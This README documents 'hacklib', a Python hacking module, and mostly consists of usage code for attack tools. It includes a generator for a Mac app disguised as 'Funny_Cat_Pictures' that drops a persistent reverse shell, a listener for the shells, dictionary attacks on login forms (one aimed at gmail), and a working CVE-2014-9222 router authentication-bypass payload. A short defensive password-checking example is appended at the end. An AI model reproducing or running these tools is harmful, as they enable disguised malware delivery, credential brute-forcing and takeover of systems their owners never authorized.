hacklib is a Python module for hacking enthusiasts interested in network security. It is no longer in active development.
To get hacklib, simply run on the command line:

```
pip install hacklib
```

hacklib also has a user interface. To use it, you can do one of the following:
Download hacklib.py and run in console:
```
python hacklib.py
----------------------------------------------
Hey. What can I do you for?

Enter the number corresponding to your choice.

1) Connect to a proxy
2) Target an IP or URL
3) Lan Scan
4) Create Backdoor
5) Server
6) Exit
```

Or if you got it using pip:
```python
import hacklib
hacklib.userInterface()
```

Reverse shell backdooring (Currently only for Macs):
```python
import hacklib

bd = hacklib.Backdoor()
# Generates an app that, when run, drops a persistent reverse shell into the system.
bd.create('127.0.0.1', 9090, 'OSX', 'Funny_Cat_Pictures')
# Takes the IP and port of the command server, the OS of the target, and the name of the .app
```

Generated App:

Listen for connections with Server:
```python
>>> import hacklib
>>> s = hacklib.Server(9090)  # Bind server to port 9090
>>> s.listen()
New connection ('127.0.0.1', 50011)  # Target ran the app (connection retried every 60 seconds)
bash: no job control in this shell
bash$ whoami  # Type a command
leon
bash$  # Nice!
```

Universal login client for almost all HTTP/HTTPS form-based logins and HTTP Basic Authentication logins:
```python
import hacklib

ac = hacklib.AuthClient()
# Logging into a gmail account
htmldata = ac.login('https://gmail.com', 'email', 'password')
# Check for a string in the resulting page
if 'Inbox' in htmldata:
    print 'Login Success.'
else:
    print 'Login Failed.'

# For logins using HTTP Basic Auth:
try:
    htmldata = ac.login('http://somewebsite.com', 'admin', 'password')
except:
    pass  # login failed
```

Simple dictionary attack using AuthClient:
```python
import hacklib

ac = hacklib.AuthClient()
# Get the top 100 most common passwords
passwords = hacklib.topPasswords(100)
for p in passwords:
    htmldata = ac.login('http://yourwebsite.com/login', 'admin', p)
    if htmldata and 'welcome' in htmldata.lower():
        print 'Password is', p
        break
```

Port Scanning:
```python
from hacklib import *

ps = PortScanner()
ps.scan(getIP('yourwebsite.com'))
# By default scans the first 1024 ports. Use ps.scan(IP, port_range=(n1, n2), timeout=i) to change the default.

# After a scan, open ports are saved within ps for reference
if ps.portOpen(80):
    # Establishes a TCP stream and sends a message
    send(getIP('yourwebsite.com'), 80, message='GET / HTTP/1.0\r\n\r\n')
```

Misfortune Cookie Exploit (CVE-2014-9222) using PortScanner:
```python
>>> import hacklib

# Discovery
>>> ps = hacklib.PortScanner()
>>> ps.scan('192.168.1.1', (80, 81))
Port 80:
HTTP/1.1 200
Content-Type: text/html
Transfer-Encoding: chunked
Server: RomPager/4.07 UPnP/1.0
EXT:
# The banner for port 80 shows us that the server uses RomPager 4.07. This version is exploitable.

# Exploitation
>>> payload = '''GET / HTTP/1.0\r\n
Host: 192.168.1.1
User-Agent: googlebot
Accept: text/html, application/xhtml+xml, application/xml; q=09, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Cookie: C107351277=BBBBBBBBBBBBBBBBBBBB\x00''' + '\r\n\r\n'
>>> hacklib.send('192.168.1.1', 80, payload)
# The cookie replaced the firmware's memory allocation for web authentication with a null byte.
# The router's admin page is now fully accessible from any web browser.
```

FTP authentication:
```python
import hacklib

ftp = hacklib.FTPAuth('127.0.0.1', 21)
try:
    ftp.login('username', 'password')
except:
    print 'Login failed.'
```

Socks4/5 proxy scraping and tunneling:
```python
>>> import hacklib
>>> import urllib2
>>> proxylist = hacklib.getProxies()  # scrape recently added socks proxies from the internet
>>> proxy = hacklib.Proxy()
>>> proxy.connect(proxylist)  # automatically find and connect to a working proxy in proxylist
>>> proxy.IP
u'41.203.214.58'
>>> proxy.port
65000
>>> proxy.country
u'KE'
# All Python network activity across all modules is routed through the proxy:
>>> urllib2.urlopen('http://icanhazip.com/').read()
'41.203.214.58\n'
# Notes: Only network activity via Python is masked by the proxy.
# Network activity in other programs such as your web browser remains unmasked.

# To filter proxies by country and type:
# proxylist = hacklib.getProxies(country_filter = ('RU', 'CA', 'SE'), proxy_type='Socks5')
```

Word Mangling:
```python
from hacklib import *

word = Mangle("Test", 0, 10, 1990, 2016)
word.Leet()
word.Numbers()
word.Years()
```

Output:
```
T3$t
Test0
0Test
...snip...
Test10
10Test
Test1990
1990Test
...snip...
Test2016
2016Test
```

Pattern Create:
```python
from hacklib import *

Pattern = PatternCreate(100)
Pattern.generate()
```

Output:
```
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
```

Pattern Offset:
```python
from hacklib import *

Offset = PatternOffset("6Ab7")
Offset.find()
```

Output:
```
[+] Offset: 50
```

Not all classes have external dependencies, but just in case you can do the following:
```python
hacklib.installDependencies()
```
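
A defensive counterpart to the Word Mangling section above, as an added example that is not part of hacklib: a password-policy check that rejects any candidate password reachable from a dictionary word through the leet, number (0 to 10) and year (1990 to 2016) variations shown in that output. The `LEET` table and the `mangled_base` and `_affix_ok` names are assumptions (the page only shows `Test` becoming `T3$t`), and the block is written for Python 3.

```python
# Added example (not hacklib code): reject passwords that are mangled dictionary words.

# Assumption: a common leetspeak table. The page only shows "Test" -> "T3$t",
# so hacklib's own substitutions may differ.
LEET = str.maketrans({"3": "e", "$": "s", "5": "s", "0": "o",
                      "1": "l", "4": "a", "@": "a", "7": "t"})
DIGITS = "0123456789"


def _affix_ok(digits, num_range, year_range):
    """True if a digit run is one that Numbers() or Years() would attach."""
    if not digits:
        return True
    if len(digits) > 1 and digits[0] == "0":
        return False  # "007" is not a value in either range
    n = int(digits)
    return (num_range[0] <= n <= num_range[1]
            or year_range[0] <= n <= year_range[1])


def mangled_base(password, wordlist, num_range=(0, 10), year_range=(1990, 2016)):
    """Return the dictionary word `password` is derived from, or None."""
    words = {w.lower() for w in wordlist}
    lead = len(password) - len(password.lstrip(DIGITS))
    trail = len(password) - len(password.rstrip(DIGITS))
    # Try every split into <digit prefix> + <core> + <digit suffix>.
    for i in range(lead + 1):
        for j in range(trail + 1):
            end = len(password) - j
            core = password[i:end].lower()
            if not core:
                continue
            if not (_affix_ok(password[:i], num_range, year_range)
                    and _affix_ok(password[end:], num_range, year_range)):
                continue
            for candidate in (core, core.translate(LEET)):
                if candidate in words:
                    return candidate
    return None


if __name__ == "__main__":
    # Constructed sample input: base words plus candidate passwords to screen.
    base_words = ["test", "password"]
    for pw in ["T3$t", "10Test", "Test2016", "p@ssw0rd1990", "Test11", "tr0ub4dor&3"]:
        hit = mangled_base(pw, base_words)
        print("%-14s %s" % (pw, "REJECT (from %r)" % hit if hit else "ok"))
```

The default ranges mirror the `Mangle("Test", 0, 10, 1990, 2016)` call, which is why `Test11` passes; widen `num_range` and `year_range` when screening real passwords.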